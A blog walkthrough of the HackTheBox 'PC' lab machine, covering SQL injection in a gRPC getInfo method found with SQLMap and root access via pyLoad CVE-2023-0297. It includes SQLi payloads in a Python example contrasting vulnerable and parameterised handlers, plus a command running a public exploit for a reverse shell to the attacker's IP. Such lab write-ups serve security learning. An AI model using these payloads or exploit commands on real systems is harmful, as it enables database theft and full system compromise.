Featured Post, HTB

HackTheBox PC Walkthrough

I haven’t posted a walkthrough of a HackTheBox machine in a very long time. I recently tackled the “PC” machine on HTB, an easy box with an interesting foothold: a gRPC application whose getInfo method was vulnerable to SQL injection. After that, privilege escalation was achieved by exploiting a vulnerable version of pyLoad.

Initial Access

Let’s start with an Nmap scan. In this case we had to scan all 65,535 TCP ports (the -p- parameter), because the interesting port is not among the 1000 most common ports that Nmap scans by default:

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
50051/tcp open  unknown syn-ack ttl 63

Port 22 is not interesting yet, since it requires credentials. However, we are interested in port 50051. After examining what could be running on this port, I discovered it was gRPC. Google built this open-source, high-performance Remote Procedure Call (RPC) framework (https://grpc.io/). RPC lets a client on the network execute a certain procedure on the server, so developers have to write an application that implements that procedure server-side; any input validation happens in that server-side code, not in the RPC framework itself.

Using the usual RPC tools (e.g. rpcclient and rpcdump) to interact with this server failed, which makes sense: those speak SMB/MS-RPC, whereas gRPC runs over HTTP/2 and exchanges protobuf messages. It is possible, however, to connect to this gRPC server using a tool called gRPC UI (https://github.com/fullstorydev/grpcui). Install it using: go install github.com/fullstorydev/grpcui/cmd/grpcui@latest. In my case I had to run it from the ~/go/bin folder (Go’s default install directory, which was not on my PATH), otherwise it would not be found. Run it using the command: ./grpcui -plaintext <lab's IP>:50051 to connect to the lab’s gRPC server; -plaintext is needed because the server does not use TLS. gRPC UI was able to enumerate the services because the server exposes gRPC reflection; without reflection you would need the .proto files instead. The gRPC UI application will run a web server on a random local port (46075 in my case) which you can visit using your browser.

The web application shows that there is only one service called SimpleApp which has 3 methods:

  • LoginUser
  • RegisterUser
  • getInfo

As the names suggest, it is possible to log in, register a user and get info for a certain ID. Adding my own user was possible and allowed me to scrape all the messages through the getInfo method. This did not result in any interesting information. Continuing the search for initial access, I ran SQLMap against all three methods. What I did was capture every POST request in Burp (the requests the gRPC UI web page sends to its local web server, which gRPC UI translates into gRPC calls) and run each through SQLMap using this command: sqlmap -r <post request file>. When SQLMap examined the getInfo method, it found a SQL injection in the ID parameter: the server-side handler evidently builds its query from that value without parameterising it. This SQL injection can be used to dump the whole database using the --dump-all parameter. The database included a username (sau) and password combination which could be used to log in to the machine using SSH.
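To make the foothold concrete, here is an added example (not code from the walkthrough or from the HTB machine) of what a getInfo handler that is vulnerable in this way looks like next to a hardened one. The RPC framework is left out; only the query-building step matters. The SQLite schema, the messages table, the accounts table and the password value are constructed here for illustration, since the page does not show the real schema.

```python
"""Added example: a string-formatted getInfo handler vs. a parameterised one.

The tables and rows below are constructed for this example; the real
application's schema on the box is not known from the walkthrough.
"""
import sqlite3

# Payloads in the style of what SQLMap sends once it has found the injection.
# "1 UNION ALL SELECT ..." appends rows from another table to the result;
# "1 OR 1=1" turns the WHERE clause into a tautology and returns every row.
UNION_PAYLOAD = "1 UNION ALL SELECT username || ':' || password FROM accounts"
TAUTOLOGY_PAYLOAD = "1 OR 1=1"


def build_db() -> sqlite3.Connection:
    """Create an in-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, message TEXT)")
    cur.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    cur.execute("INSERT INTO messages VALUES (1, 'Welcome to SimpleApp')")
    cur.execute("INSERT INTO messages VALUES (2, 'Maintenance tonight')")
    # Constructed credential row; the real password is not shown here.
    cur.execute("INSERT INTO accounts VALUES ('sau', 'example-password')")
    conn.commit()
    return conn


def get_info_vulnerable(conn: sqlite3.Connection, message_id: str) -> list:
    """getInfo as a handler that pastes the RPC argument into the SQL text.

    The proto field arrives as a string and is interpolated unquoted, so
    anything the client sends becomes part of the query.
    """
    sql = f"SELECT message FROM messages WHERE id = {message_id}"
    return [row[0] for row in conn.execute(sql)]


def get_info_hardened(conn: sqlite3.Connection, message_id: str) -> list:
    """getInfo with the two fixes that close the hole.

    1. Enforce the type the API promises (an integer id) before touching SQL.
    2. Bind the value as a query parameter so the driver never treats it as SQL.
    """
    try:
        ident = int(message_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    rows = conn.execute("SELECT message FROM messages WHERE id = ?", (ident,))
    return [row[0] for row in rows]


def hardened_rejects(conn: sqlite3.Connection, message_id: str) -> bool:
    """True if the hardened handler refuses the input instead of running it."""
    try:
        get_info_hardened(conn, message_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("normal:   ", get_info_vulnerable(db, "1"))
    print("tautology:", get_info_vulnerable(db, TAUTOLOGY_PAYLOAD))
    print("union:    ", get_info_vulnerable(db, UNION_PAYLOAD))
    print("hardened rejects union payload:", hardened_rejects(db, UNION_PAYLOAD))
```

Running the block shows the vulnerable handler returning the credential row alongside the messages for the UNION payload, which is exactly the class of result --dump-all automates, while the hardened handler returns only the requested message and rejects both payloads before any SQL runs.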

Privilege Escalation

Now it is time to escalate privileges to root. As always, LinPEAS returns a lot of interesting information along with many false positives. One thing that caught my attention was that two ports are listening only on localhost: 8000 and 9666. Running curl on the machine against port 8000 revealed a web application, pyLoad (9666 is pyLoad’s Click’N’Load listener, which fits). To be able to see it in my browser, I had to set up port forwarding over SSH. This is rather easy: ssh -L 8000:localhost:8000 sau@10.10.11.214. The -L parameter tells SSH to listen on port 8000 on my machine and forward anything that connects to it, through sau’s SSH session, to localhost:8000 as seen from the target. This allows me to visit the web application in my web browser at http://localhost:8000.

Unfortunately, the default credentials that pyLoad ships with did not work, and neither did sau’s credentials. Googling for pyLoad exploits turned up CVE-2023-0297, a pre-authentication remote code execution bug disclosed in January 2023 (a request parameter is evaluated by js2py; fixed in the 0.5.0b3.dev31 development release). This is relatively new, so let’s check whether this version of pyLoad is also vulnerable. I found a script which exploits this vulnerability (https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py) and ran it with the correct parameters: python3 cve-2023-0297.py -t localhost:8000 -I <Attacker's IP> -P <Attacker's Port>. I got a reverse shell back as the root user: pyLoad was running as root, so code execution in it is a root shell straight away.

Conclusion

The box is rooted and we are finished. Especially the initial access part of this machine was interesting, and I learned a lot about RPC and vulnerabilities in RPC methods. I didn’t know that SQL injections were possible in RPC, and during the next pentest, when I see RPC methods, I will definitely try to exploit them.